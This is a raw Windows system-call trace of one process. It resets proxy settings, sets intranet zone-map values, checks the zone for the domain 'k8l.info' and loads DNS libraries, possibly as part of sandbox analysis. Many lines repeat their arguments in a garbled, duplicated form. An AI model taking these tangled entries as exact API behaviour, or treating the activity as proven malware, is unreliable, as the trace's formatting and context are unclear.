 04584   712   NtQueryValueKey  (640,  (640, "DefaultConnectionSettings", Partial, 144, ... TitleIdx=0, Type=3, Data="<\0\0\0\3\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4\0\0\0\0\0\0\00f\32\27\250\231\307\1\1\0\0\0\300\250|\200\0\0\0\0\0\0\0\0"}, 68, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (640, "DefaultConnectionSettings", Partial, 144, ... TitleIdx=0, Type=3, Data="<\0\0\0\3\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4\0\0\0\0\0\0\00f\32\27\250\231\307\1\1\0\0\0\300\250|\200\0\0\0\0\0\0\0\0"}, 68, ) }, 68, ) == 0x0
 04585   712   NtQueryValueKey  (640,  (640, "DefaultConnectionSettings", Partial, 144, ... TitleIdx=0, Type=3, Data="<\0\0\0\3\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4\0\0\0\0\0\0\00f\32\27\250\231\307\1\1\0\0\0\300\250|\200\0\0\0\0\0\0\0\0"}, 68, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (640, "DefaultConnectionSettings", Partial, 144, ... TitleIdx=0, Type=3, Data="<\0\0\0\3\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4\0\0\0\0\0\0\00f\32\27\250\231\307\1\1\0\0\0\300\250|\200\0\0\0\0\0\0\0\0"}, 68, ) }, 68, ) == 0x0
 04586   712   NtReleaseMutant  (456, ... 0x0, ) == 0x0
 04587   712   NtClose  (640, ... ) == 0x0
 04588   712   NtWaitForSingleObject  (436, 0, 0x0, ... ) == 0x0
 04589   712   NtClearEvent  (436, ... ) == 0x0
 04590   712   NtSetEvent  (436, ... 0x0, ) == 0x0
 04591   712   NtCreateKey  (0x20006, {24, 636, 0x40, 0, 0,  (0x20006, {24, 636, 0x40, 0, 0, "Software\Microsoft\windows\CurrentVersion\Internet Settings"}, 0, "", 0, ... 640, 2, ) }, 0, "", 0, ... 640, 2, ) == 0x0
 04592   712   NtSetValueKey  (640,  (640, "ProxyEnable", 0, 4, "\0\0\0\0", 4, ... ) , 0, 4,  (640, "ProxyEnable", 0, 4, "\0\0\0\0", 4, ... ) , 4, ... ) == 0x0
 04593   712   NtDeleteValueKey  (640,  (640, "ProxyServer", ... ) , ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04594   712   NtDeleteValueKey  (640,  (640, "ProxyOverride", ... ) , ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04595   712   NtDeleteValueKey  (640,  (640, "AutoConfigURL", ... ) , ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04596   712   NtClose  (640, ... ) == 0x0
 04597   712   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\MACHINE\SYSTEM\CURRENTCONTROLSET\HARDWARE PROFILES\CURRENT"}, ... 640, ) }, ... 640, ) == 0x0
 04598   712   NtCreateKey  (0x2, {24, 640, 0x40, 0, 0,  (0x2, {24, 640, 0x40, 0, 0, "Software\Microsoft\windows\CurrentVersion\Internet Settings"}, 0, "", 0, ... 644, 2, ) }, 0, "", 0, ... 644, 2, ) == 0x0
 04599   712   NtSetValueKey  (644,  (644, "ProxyEnable", 0, 4, "\0\0\0\0", 4, ... ) , 0, 4,  (644, "ProxyEnable", 0, 4, "\0\0\0\0", 4, ... ) , 4, ... ) == 0x0
 04600   712   NtClose  (644, ... ) == 0x0
 04601   712   NtWaitForSingleObject  (456, 0, 0x0, ... ) == 0x0
 04602   712   NtCreateKey  (0x1, {24, 636, 0x40, 0, 0,  (0x1, {24, 636, 0x40, 0, 0, "Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections"}, 0, "", 0, ... 644, 2, ) }, 0, "", 0, ... 644, 2, ) == 0x0
 04603   712   NtQueryValueKey  (644,  (644, "SavedLegacySettings", Partial, 144, ... TitleIdx=0, Type=3, Data="<\0\0\0\26\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4\0\0\0\0\0\0\00f\32\27\250\231\307\1\1\0\0\0\300\250|\200\0\0\0\0\0\0\0\0"}, 68, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (644, "SavedLegacySettings", Partial, 144, ... TitleIdx=0, Type=3, Data="<\0\0\0\26\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4\0\0\0\0\0\0\00f\32\27\250\231\307\1\1\0\0\0\300\250|\200\0\0\0\0\0\0\0\0"}, 68, ) }, 68, ) == 0x0
 04604   712   NtQueryValueKey  (644,  (644, "SavedLegacySettings", Partial, 144, ... TitleIdx=0, Type=3, Data="<\0\0\0\26\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4\0\0\0\0\0\0\00f\32\27\250\231\307\1\1\0\0\0\300\250|\200\0\0\0\0\0\0\0\0"}, 68, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (644, "SavedLegacySettings", Partial, 144, ... TitleIdx=0, Type=3, Data="<\0\0\0\26\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4\0\0\0\0\0\0\00f\32\27\250\231\307\1\1\0\0\0\300\250|\200\0\0\0\0\0\0\0\0"}, 68, ) }, 68, ) == 0x0
 04605   712   NtCreateKey  (0x2, {24, 636, 0x40, 0, 0,  (0x2, {24, 636, 0x40, 0, 0, "Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections"}, 0, "", 0, ... 652, 2, ) }, 0, "", 0, ... 652, 2, ) == 0x0
 04606   712   NtReleaseMutant  (456, ... 0x0, ) == 0x0
 04607   712   NtClose  (644, ... ) == 0x0
 04608   712   NtSetValueKey  (652,  (652, "SavedLegacySettings", 0, 3, "<\0\0\0\27\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4\0\0\0\0\0\0\00f\32\27\250\231\307\1\1\0\0\0\300\250|\200\0\0\0\0\0\0\0\0", 56, ... , 0, 3,  (652, "SavedLegacySettings", 0, 3, "<\0\0\0\27\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4\0\0\0\0\0\0\00f\32\27\250\231\307\1\1\0\0\0\300\250|\200\0\0\0\0\0\0\0\0", 56, ... , 56, ...
 04609   712   NtSetInformationFile  (-2147482700, -136116428, 8, EndOfFile, ... {status=0x0, info=0}, ) == 0x0
 04610   712   NtSetInformationFile  (-2147482700, -136116528, 8, EndOfFile, ... {status=0x0, info=0}, ) == 0x0
 04608   712   NtSetValueKey  ... ) == 0x0
 04611   712   NtClose  (652, ... ) == 0x0
 04612   712   NtReleaseMutant  (448, ... 0x0, ) == 0x0
 04613   712   NtOpenKey  (0x20019, {24, 52, 0x40, 0, 0,  (0x20019, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"}, ... 652, ) }, ... 652, ) == 0x0
 04614   712   NtRequestWaitReplyPort  (392, {28, 52, new_msg, 0, 0, 0, 0, 0}  (392, {28, 52, new_msg, 0, 0, 0, 0, 0} "\37\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\1\0\13\30\10\2\2401\27\0" ... {176, 200, reply, 0, 452, 712, 1580, 0} "\37\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\1\0\20\0\10\2\220\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0S\0R\0I\0-\0u\0s\0e\0r\0" )  ... {176, 200, reply, 0, 452, 712, 1580, 0}  (392, {28, 52, new_msg, 0, 0, 0, 0, 0} "\37\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\1\0\13\30\10\2\2401\27\0" ... {176, 200, reply, 0, 452, 712, 1580, 0} "\37\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\1\0\20\0\10\2\220\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0S\0R\0I\0-\0u\0s\0e\0r\0" )  ) == 0x0
 04615   712   NtCreateSection  (0xf0007, {24, 64, 0x80, 0, 0,  (0xf0007, {24, 64, 0x80, 0, 0, "UrlZonesSM_SRI-user"}, {8, 0}, 4, 134217728, 0, ... 644, ) }, {8, 0}, 4, 134217728, 0, ... 644, ) == 0x0
 04616   712   NtMapViewOfSection  (644, -1, (0x0), 0, 0, {0, 0}, 0, 1, 0, 4, ... (0x17a0000), {0, 0}, 4096, ) == 0x0
 04617   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "System\Setup"}, ... 664, ) }, ... 664, ) == 0x0
 04618   712   NtQueryValueKey  (664,  (664, "SystemSetupInProgress", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (664, "SystemSetupInProgress", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 04619   712   NtClose  (664, ... ) == 0x0
 04620   712   NtOpenKey  (0x20019, {24, 52, 0x40, 0, 0,  (0x20019, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\"}, ... 664, ) }, ... 664, ) == 0x0
 04621   712   NtOpenKey  (0x20019, {24, 664, 0x40, 0, 0,  (0x20019, {24, 664, 0x40, 0, 0, "0"}, ... 668, ) }, ... 668, ) == 0x0
 04622   712   NtClose  (668, ... ) == 0x0
 04623   712   NtOpenKey  (0x20019, {24, 664, 0x40, 0, 0,  (0x20019, {24, 664, 0x40, 0, 0, "1"}, ... 668, ) }, ... 668, ) == 0x0
 04624   712   NtClose  (668, ... ) == 0x0
 04625   712   NtOpenKey  (0x20019, {24, 664, 0x40, 0, 0,  (0x20019, {24, 664, 0x40, 0, 0, "2"}, ... 668, ) }, ... 668, ) == 0x0
 04626   712   NtClose  (668, ... ) == 0x0
 04627   712   NtOpenKey  (0x20019, {24, 664, 0x40, 0, 0,  (0x20019, {24, 664, 0x40, 0, 0, "3"}, ... 668, ) }, ... 668, ) == 0x0
 04628   712   NtClose  (668, ... ) == 0x0
 04629   712   NtOpenKey  (0x20019, {24, 664, 0x40, 0, 0,  (0x20019, {24, 664, 0x40, 0, 0, "4"}, ... 668, ) }, ... 668, ) == 0x0
 04630   712   NtClose  (668, ... ) == 0x0
 04631   712   NtClose  (664, ... ) == 0x0
 04632   712   NtOpenKey  (0x20019, {24, 52, 0x40, 0, 0,  (0x20019, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\"}, ... 664, ) }, ... 664, ) == 0x0
 04633   712   NtEnumerateKey  (664, 0, Basic, 288, ... {LastWrite={0x8db90da8,0x1c7399c}, TitleIdx=0, Name= (664, 0, Basic, 288, ... {LastWrite={0x8db90da8,0x1c7399c}, TitleIdx=0, Name="0"}, 18, ) }, 18, ) == 0x0
 04634   712   NtOpenKey  (0x20019, {24, 52, 0x40, 0, 0,  (0x20019, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"}, ... 668, ) }, ... 668, ) == 0x0
 04635   712   NtQueryValueKey  (668,  (668, "Flags", Partial, 144, ... TitleIdx=0, Type=4, Data="!\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (668, "Flags", Partial, 144, ... TitleIdx=0, Type=4, Data="!\0\0\0"}, 16, ) }, 16, ) == 0x0
 04636   712   NtClose  (668, ... ) == 0x0
 04637   712   NtEnumerateKey  (664, 1, Basic, 288, ... {LastWrite={0x8f7e0c74,0x1c7399c}, TitleIdx=0, Name= (664, 1, Basic, 288, ... {LastWrite={0x8f7e0c74,0x1c7399c}, TitleIdx=0, Name="1"}, 18, ) }, 18, ) == 0x0
 04638   712   NtOpenKey  (0x20019, {24, 52, 0x40, 0, 0,  (0x20019, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1"}, ... 668, ) }, ... 668, ) == 0x0
 04639   712   NtQueryValueKey  (668,  (668, "Flags", Partial, 144, ... TitleIdx=0, Type=4, Data="\333\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (668, "Flags", Partial, 144, ... TitleIdx=0, Type=4, Data="\333\0\0\0"}, 16, ) }, 16, ) == 0x0
 04640   712   NtWaitForSingleObject  (12, 0, 0x0, ... ) == 0x0
 04641   712   NtReleaseMutant  (12, ... 0x0, ) == 0x0
 04642   712   NtOpenKey  (0x2001f, {24, 52, 0x40, 0, 0,  (0x2001f, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"}, ... 672, ) }, ... 672, ) == 0x0
 04643   712   NtSetValueKey  (672,  (672, "ProxyBypass", 0, 4, "\1\0\0\0", 4, ... ) , 0, 4,  (672, "ProxyBypass", 0, 4, "\1\0\0\0", 4, ... ) , 4, ... ) == 0x0
 04644   712   NtSetValueKey  (672,  (672, "IntranetName", 0, 4, "\1\0\0\0", 4, ... ) , 0, 4,  (672, "IntranetName", 0, 4, "\1\0\0\0", 4, ... ) , 4, ... ) == 0x0
 04645   712   NtSetValueKey  (672,  (672, "UNCAsIntranet", 0, 4, "\1\0\0\0", 4, ... ) , 0, 4,  (672, "UNCAsIntranet", 0, 4, "\1\0\0\0", 4, ... ) , 4, ... ) == 0x0
 04646   712   NtClose  (672, ... ) == 0x0
 04647   712   NtClose  (668, ... ) == 0x0
 04648   712   NtEnumerateKey  (664, 2, Basic, 288, ... {LastWrite={0x8f7e0c74,0x1c7399c}, TitleIdx=0, Name= (664, 2, Basic, 288, ... {LastWrite={0x8f7e0c74,0x1c7399c}, TitleIdx=0, Name="2I"}, 18, ) }, 18, ) == 0x0
 04649   712   NtOpenKey  (0x20019, {24, 52, 0x40, 0, 0,  (0x20019, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2"}, ... 668, ) }, ... 668, ) == 0x0
 04650   712   NtQueryValueKey  (668,  (668, "Flags", Partial, 144, ... TitleIdx=0, Type=4, Data="G\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (668, "Flags", Partial, 144, ... TitleIdx=0, Type=4, Data="G\0\0\0"}, 16, ) }, 16, ) == 0x0
 04651   712   NtClose  (668, ... ) == 0x0
 04652   712   NtEnumerateKey  (664, 3, Basic, 288, ... {LastWrite={0x8f7e0c74,0x1c7399c}, TitleIdx=0, Name= (664, 3, Basic, 288, ... {LastWrite={0x8f7e0c74,0x1c7399c}, TitleIdx=0, Name="3"}, 18, ) }, 18, ) == 0x0
 04653   712   NtOpenKey  (0x20019, {24, 52, 0x40, 0, 0,  (0x20019, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3"}, ... 668, ) }, ... 668, ) == 0x0
 04654   712   NtQueryValueKey  (668,  (668, "Flags", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (668, "Flags", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 04655   712   NtClose  (668, ... ) == 0x0
 04656   712   NtEnumerateKey  (664, 4, Basic, 288, ... {LastWrite={0x8f7e0c74,0x1c7399c}, TitleIdx=0, Name= (664, 4, Basic, 288, ... {LastWrite={0x8f7e0c74,0x1c7399c}, TitleIdx=0, Name="4"}, 18, ) }, 18, ) == 0x0
 04657   712   NtOpenKey  (0x20019, {24, 52, 0x40, 0, 0,  (0x20019, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4"}, ... 668, ) }, ... 668, ) == 0x0
 04658   712   NtQueryValueKey  (668,  (668, "Flags", Partial, 144, ... TitleIdx=0, Type=4, Data="\3\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (668, "Flags", Partial, 144, ... TitleIdx=0, Type=4, Data="\3\0\0\0"}, 16, ) }, 16, ) == 0x0
 04659   712   NtClose  (668, ... ) == 0x0
 04660   712   NtEnumerateKey  (664, 5, Basic, 288, ... ) == STATUS_NO_MORE_ENTRIES
 04661   712   NtClose  (664, ... ) == 0x0
 04662   712   NtWaitForSingleObject  (12, 0, 0x0, ... ) == 0x0
 04663   712   NtReleaseMutant  (12, ... 0x0, ) == 0x0
 04664   712   NtOpenKey  (0x20019, {24, 652, 0x40, 0, 0,  (0x20019, {24, 652, 0x40, 0, 0, "Domains\k8l.info"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04665   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\k8l.info"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04666   712   NtQueryValueKey  (652,  (652, "IntranetName", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (652, "IntranetName", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 04667   712   NtQueryValueKey  (652,  (652, "ProxyBypass", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (652, "ProxyBypass", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 04668   712   NtClearEvent  (436, ... ) == 0x0
 04669   712   NtSetEvent  (436, ... 0x0, ) == 0x0
 04670   712   NtOpenKey  (0x20019, {24, 652, 0x40, 0, 0,  (0x20019, {24, 652, 0x40, 0, 0, "ProtocolDefaults\"}, ... 664, ) }, ... 664, ) == 0x0
 04671   712   NtQueryValueKey  (664,  (664, "http", Partial, 144, ... TitleIdx=0, Type=4, Data="\3\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (664, "http", Partial, 144, ... TitleIdx=0, Type=4, Data="\3\0\0\0"}, 16, ) }, 16, ) == 0x0
 04672   712   NtClose  (664, ... ) == 0x0
 04673   712   NtWaitForSingleObject  (12, 0, 0x0, ... ) == 0x0
 04674   712   NtReleaseMutant  (12, ... 0x0, ) == 0x0
 04675   712   NtWaitForSingleObject  (12, 0, 0x0, ... ) == 0x0
 04676   712   NtReleaseMutant  (12, ... 0x0, ) == 0x0
 04677   712   NtWaitForSingleObject  (80, 0, 0x0, ... ) == 0x0
 04678   712   NtReleaseMutant  (80, ... 0x0, ) == 0x0
 04679   712   NtOpenKey  (0x20019, {24, 52, 0x40, 0, 0,  (0x20019, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3"}, ... 664, ) }, ... 664, ) == 0x0
 04680   712   NtQueryValueKey  (664,  (664, "1A10", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (664, "1A10", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 04681   712   NtWaitForSingleObject  (80, 0, 0x0, ... ) == 0x0
 04682   712   NtReleaseMutant  (80, ... 0x0, ) == 0x0
 04683   712   NtWaitForSingleObject  (80, 0, 0x0, ... ) == 0x0
 04684   712   NtReleaseMutant  (80, ... 0x0, ) == 0x0
 04685   712   NtClose  (664, ... ) == 0x0
 04686   712   NtWaitForSingleObject  (404, 0, 0x0, ... ) == 0x0
 04687   712   NtQueryInformationFile  (400, 24706452, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 04688   712   NtReleaseMutant  (404, ... 0x0, ) == 0x0
 04689   712   NtWaitForSingleObject  (404, 0, 0x0, ... ) == 0x0
 04690   712   NtQueryInformationFile  (400, 24704068, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 04691   712   NtReleaseMutant  (404, ... 0x0, ) == 0x0
 04692   712   NtWaitForSingleObject  (412, 0, 0x0, ... ) == 0x0
 04693   712   NtQueryInformationFile  (420, 24706032, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 04694   712   NtReleaseMutant  (412, ... 0x0, ) == 0x0
 04695   712   NtWaitForSingleObject  (412, 0, 0x0, ... ) == 0x0
 04696   712   NtQueryInformationFile  (420, 24705992, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 04697   712   NtReleaseMutant  (412, ... 0x0, ) == 0x0
 04698   712   NtDuplicateObject  (-1, -2, -1, 0x0, 0, 2, ... 664, ) == 0x0
 04699   712   NtWaitForSingleObject  (476, 0, {0, 0}, ... ) == 0x102
 04700   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\mswsock.dll"}, 24702620, ... ) }, 24702620, ... ) == 0x0
 04701   712   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 668, ) == 0x0
 04702   712   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "DNSAPI.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04703   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\DNSAPI.dll"}, 24702736, ... ) }, 24702736, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04704   712   NtQueryAttributesFile  ({24, 112, 0x40, 0, 0,  ({24, 112, 0x40, 0, 0, "DNSAPI.dll"}, 24702736, ... ) }, 24702736, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04705   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\DNSAPI.dll"}, 24702736, ... ) }, 24702736, ... ) == 0x0
 04706   712   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\DNSAPI.dll"}, 5, 96, ... 672, {status=0x0, info=1}, ) }, 5, 96, ... 672, {status=0x0, info=1}, ) == 0x0
 04707   712   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 672, ... 676, ) == 0x0
 04708   712   NtQuerySection  (676, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 04709   712   NtClose  (672, ... ) == 0x0
 04710   712   NtMapViewOfSection  (676, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x76f20000), 0x0, 151552, ) == 0x0
 04711   712   NtClose  (676, ... ) == 0x0
 04712   712   NtCreateKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\Tcpip\Parameters"}, 0, "Class", 0, ... 676, 2, ) }, 0,  (0x20019, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\Tcpip\Parameters"}, 0, "Class", 0, ... 676, 2, ) , 0, ... 676, 2, ) == 0x0
 04713   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\DnsCache\Parameters"}, ... 672, ) }, ... 672, ) == 0x0
 04714   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Policies\Microsoft\Windows NT\DnsClient"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04715   712   NtOpenKey  (0x1, {24, 48, 0x40, 0, 0,  (0x1, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\DNS"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04716   712   NtQueryValueKey  (672,  (672, "QueryAdapterName", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04717   712   NtQueryValueKey  (676,  (676, "DisableAdapterDomainName", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04718   712   NtQueryValueKey  (672,  (672, "UseDomainNameDevolution", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04719   712   NtQueryValueKey  (676,  (676, "UseDomainNameDevolution", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (676, "UseDomainNameDevolution", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 04720   712   NtQueryValueKey  (672,  (672, "PrioritizeRecordData", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04721   712   NtQueryValueKey  (676,  (676, "PrioritizeRecordData", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04722   712   NtQueryValueKey  (672,  (672, "AllowUnqualifiedQuery", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04723   712   NtQueryValueKey  (676,  (676, "AllowUnqualifiedQuery", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04724   712   NtQueryValueKey  (672,  (672, "AppendToMultiLabelName", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04725   712   NtQueryValueKey  (672,  (672, "ScreenBadTlds", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04726   712   NtQueryValueKey  (672,  (672, "ScreenUnreachableServers", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04727   712   NtQueryValueKey  (672,  (672, "FilterClusterIp", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04728   712   NtQueryValueKey  (672,  (672, "WaitForNameErrorOnAll", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04729   712   NtQueryValueKey  (672,  (672, "UseEdns", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04730   712   NtQueryValueKey  (672,  (672, "RegistrationEnabled", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04731   712   NtQueryValueKey  (676,  (676, "DisableDynamicUpdate", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04732   712   NtQueryValueKey  (672,  (672, "RegisterPrimaryName", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04733   712   NtQueryValueKey  (672,  (672, "RegisterAdapterName", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04734   712   NtQueryValueKey  (676,  (676, "EnableAdapterDomainNameRegistration", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04735   712   NtQueryValueKey  (672,  (672, "RegisterReverseLookup", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04736   712   NtQueryValueKey  (676,  (676, "DisableReverseAddressRegistrations", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04737   712   NtQueryValueKey  (672,  (672, "RegisterWanAdapters", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04738   712   NtQueryValueKey  (676,  (676, "DisableWanDynamicUpdate", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04739   712   NtQueryValueKey  (672,  (672, "RegistrationOverwritesInConflict", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04740   712   NtQueryValueKey  (676,  (676, "DisableReplaceAddressesInConflicts", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04741   712   NtQueryValueKey  (672,  (672, "RegistrationTtl", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04742   712   NtQueryValueKey  (676,  (676, "DefaultRegistrationTTL", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04743   712   NtQueryValueKey  (672,  (672, "RegistrationRefreshInterval", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
